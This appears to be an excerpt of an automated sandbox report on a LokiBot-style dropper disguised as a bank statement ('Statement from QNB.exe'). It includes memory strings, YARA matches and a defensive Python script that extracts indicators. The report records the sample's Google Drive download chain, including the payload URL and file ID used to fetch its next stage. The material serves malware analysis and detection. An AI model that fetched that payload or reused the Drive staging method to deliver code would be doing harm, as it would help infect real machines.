Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/qr
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/v
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81646618008.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/~
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp | String found in binary or memory: https://docs.google.com/:5
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp | String found in binary or memory: https://docs.google.com/b5
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81489163627.000000000096F000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491294279.000000000096E000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmp | String found in binary or memory: https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleuserco
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/0By
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/F
Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/J
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/J4
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/M
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/T
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpq
                    Source: Statement from QNB.exe, 00000004.00000003.80961592797.0000000000875000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNprezy-qH_LiFQvT2qU
                    Source: Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNptsv
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpu
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/~
                    Source: iexplore.exe, 00000011.00000002.81169528331.00000000030FA000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81169483229.00000000030F5000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166049858.0000000003787000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                    Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
                    Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
                    Source: iexplore.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://www.google.com
                    Source: iexplore.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknown | DNS traffic detected: queries for: drive.google.com
                    Source: global traffic | HTTP traffic detected:
                        GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: drive.google.com
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Cache-Control: no-cache
                        Host: doc-00-5k-docs.googleusercontent.com
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: drive.google.com
                        Cache-Control: no-cache
                        Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global traffic | HTTP traffic detected:
                        GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Cache-Control: no-cache
                        Host: doc-0k-48-docs.googleusercontent.com
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected:
                        GET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Host: docs.google.com
                        Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global traffic | HTTP traffic detected:
                        GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Host: doc-0k-48-docs.googleusercontent.com
                        Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=1h1o0go4qslkm
                    Source: global traffic | HTTP traffic detected:
                        GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: drive.google.com
                        Cache-Control: no-cache
                        Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global traffic | HTTP traffic detected:
                        GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Cache-Control: no-cache
                        Host: doc-0k-48-docs.googleusercontent.com
                        Connection: Keep-Alive
                        Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                    Source: global traffic | HTTP traffic detected:
                        GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: drive.google.com
                        Cache-Control: no-cache
                        Cookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global traffic | HTTP traffic detected:
                        GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Cache-Control: no-cache
                        Host: doc-0k-48-docs.googleusercontent.com
                        Connection: Keep-Alive
                        Cookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                    Source: unknown | HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
                    Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 14_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA
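The HTTP requests recorded above are the full Google Drive download chain for one file ID: the `/uc?export=download` request on drive.google.com, the redirect to a `*.googleusercontent.com` `/docs/securesc/.../<file id>?e=download` URL, and the `docs.google.com/nonceSigner` hop that carries the same URL in its `continue` parameter before the payload is finally served. The Python below is an added example, not part of the Joe Sandbox report: it parses raw requests of that shape, extracts the Drive file ID from each hop (including the URL-encoded `continue` value), and reports whether an ID requested from drive.google.com was actually served from a googleusercontent host, which is the signal that the next stage was fetched rather than merely attempted. The sample input is constructed from the report's own request lines with cookie headers omitted; all function and class names are my own.

```python
"""Extract Google Drive download-chain IOCs from captured HTTP requests (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qs, urlparse

# Constructed sample input: three of the request lines listed in the report,
# re-joined as raw HTTP/1.1 request heads (cookie headers omitted).
SAMPLE_REQUESTS: List[str] = [
    "GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/"
    "1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Cache-Control: no-cache\r\n"
    "Host: doc-00-5k-docs.googleusercontent.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/"
    "docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/"
    "06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload"
    "&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: docs.google.com\r\n\r\n",
]


@dataclass
class HttpRequest:
    method: str
    target: str               # request-target as sent (path plus query)
    headers: Dict[str, str]   # header names lower-cased

    @property
    def host(self) -> str:
        return self.headers.get("host", "")


def parse_request(raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.1 request head (request line followed by headers)."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break                                  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers)


# Drive serves the file bytes from /docs/securesc/<opaque segments>/<file id>?e=download
_SECURESC = re.compile(r"^/docs/securesc/(?:[^/]+/)+([A-Za-z0-9_-]+)$")


def drive_file_id(host: str, target: str) -> Optional[str]:
    """Return the Drive file ID a request refers to, following each hop of the chain."""
    url = urlparse(target)
    query = parse_qs(url.query)
    if host == "drive.google.com" and url.path == "/uc" and query.get("export") == ["download"]:
        return query.get("id", [None])[0]
    if host.endswith("docs.googleusercontent.com"):
        m = _SECURESC.match(url.path)
        return m.group(1) if m else None
    if host == "docs.google.com" and url.path == "/nonceSigner":
        # The signed redirect target is carried, URL-encoded, in the continue parameter;
        # parse_qs decodes it, so the inner URL can be resolved like a direct request.
        cont = query.get("continue", [None])[0]
        if cont:
            inner = urlparse(cont)
            return drive_file_id(inner.netloc, inner.path + "?" + inner.query)
    return None


@dataclass
class DriveChainSummary:
    file_ids: Set[str] = field(default_factory=set)     # every ID seen on any hop
    served_ids: Set[str] = field(default_factory=set)   # IDs fetched from googleusercontent after a /uc request
    hosts: Set[str] = field(default_factory=set)
    user_agents: Set[str] = field(default_factory=set)


def summarize(raw_requests: List[str]) -> DriveChainSummary:
    """Walk the requests in capture order and collect Drive download IOCs."""
    s = DriveChainSummary()
    requested: Set[str] = set()
    for raw in raw_requests:
        req = parse_request(raw)
        s.hosts.add(req.host)
        s.user_agents.add(req.headers.get("user-agent", ""))
        fid = drive_file_id(req.host, req.target)
        if fid is None:
            continue
        s.file_ids.add(fid)
        if req.host == "drive.google.com":
            requested.add(fid)
        elif req.host.endswith("docs.googleusercontent.com") and fid in requested:
            s.served_ids.add(fid)
    return s


if __name__ == "__main__":
    summary = summarize(SAMPLE_REQUESTS)
    print("file IDs:", sorted(summary.file_ids))
    print("served:  ", sorted(summary.served_ids))
    print("hosts:   ", sorted(summary.hosts))
```

Feed it the requests from a PCAP or proxy log in capture order; `served_ids` is what to pivot on, since the same Drive file ID will appear in other samples' memory strings and configurations, while the `securesc` path segments and the NID/AUTH cookie values are session-specific and not useful as indicators.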

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: Statement from QNB.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\Desktop\Statement from QNB.exe | Code function: 0_2_00401771
                    Source: C:\Users\user\Desktop\Statement from QNB.exe | Code function: 0_2_00401724
                    Source: C:\Users\user\Desktop\Statement from QNB.exe